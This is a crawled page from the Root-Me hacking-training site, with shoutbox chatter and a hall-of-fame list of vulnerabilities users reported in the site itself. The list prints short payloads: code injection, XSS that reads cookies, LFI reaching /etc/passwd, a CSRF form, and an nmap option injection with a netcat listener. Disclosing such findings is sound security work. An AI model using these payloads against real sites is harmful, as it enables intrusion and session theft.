logo http://www.root-me.org logo http://www.root-me.orglogo http://www.root-me.org Create an account | Login | français  
Home  -> Infos  -> Hacks
Twitter Stream
Your Informations

IP : 38.107.179.224
Location :
Lang : en-us
Browser : CCBot/1.0 (+http://www.commoncrawl.org/bot.html)

Users

11 visiteurs en ce moment

Last registered users :
 dogo19   novice2005   pwet99   Hughe   Auranium   Belebostre   Sperrow 
Statistics
statistiques -Membrers : 2586
-Papers : 483
-Messages : 397
-ShoutBox : 522
-Challengers : 1741
ShoutBox
g0uZ    23 April 2012 20:01:43
check : http://router.root-me.org/

xyphr    23 April 2012 15:55:35
hi, how come the wargames do not connect on port 2223 ? or on 22 the user and pass dont work ?

koma    26 February 2012 16:19:13
kapil sharma maybe you are searching at the wrong place

kapil sharma    25 February 2012 19:25:00
i am unable to understand that what paasword is putting into stegnography image method . .what is the puzzle?

kapil sharma    25 February 2012 19:24:12
i am unable to understand that what paasword is putting into stegnography image method . .what is the puzzle?

5P00N    7 February 2012 22:07:33
what do i do on here my friend told me it teaches you to hack from square 1

5P00N    7 February 2012 22:07:22
what do i do on here my friend told me it teaches you to hack from square1

Armel    27 August 2011 22:07:35
Of course John!

g0uZ    29 January 2011 11:34:57
Fixed : lang handling bug.

g0uZ    23 January 2011 19:07:32
Welcome all !


You have to be logged in to post
HG

Hacks

H4cks of the site

- [02/12/2009] real found a code injection vulnerability :

http://www.root-me.org/spip.php?page=poster&id_article=1'.system('pwd').'

- [02/02/2011] hello found several stored XSS in the PM system :

<script>[code javascript/vbscript]</script>

- [15/02/2011] essandre found a LFI :

http://www.root-me.org/squelettes/script/protection_acces_http.php?file=../../../../../../../etc/passwd

- [30/06/2011] elyfean found a CSRF on the chatbox :

<form id="form" action="http//www.root-me.org/?lang=fr" method="post">
<input type=hidden name="ON" value="1">
<input type=hidden name="message" value="0wn3d !">
</form>

- [11/07/2011] Armel found an XSS on the chatbox.

<iframe src="javascript:[code javascript]' />

- [18/07/2011] g0uZ found a PHP code injection vulnerability on the "online tools : nmap"

Host to scan in -sV mode :

--version-trace -p8888 [IP server attacker]

Service listening on attacker server

i=0; while [ $i -lt 5 ]; do nc -v -l -p 8888 -e '<?php [CODE PHP];?>'; i=$(( $i+1 )); done

- [02/10/2011] Hypnoze57 found a insecure indirect object references which lead to unauthorized access to all PM :

http://www.root-me.org/spip.php?page=messagerie&id=write&repondre=[id_message_to_read]

- [23/10/2011] courte66 found a reflected XSS in the "encode - decode" page :

Text to decode in base64

Jz4iPjxpbWcgc3JjPWxvbCBvbmVycm9yPWFsZXJ0KGRvY3VtZW50LmNvb2tpZSkgLz4=

- [20/03/2012] jimee found a LFI in the realistic challenge 9 :

http://www.root-me.org/challenge/realiste/ch9/page_..%252f..%252f..%252fch1%252fmesfonction.php
BG BD

The Project |  Legal Disclaimer |  Site Map |  Contact |  Subscribe | Dynamic Stream     
Root
Me.org
La root est longue, mais la voie est Libre...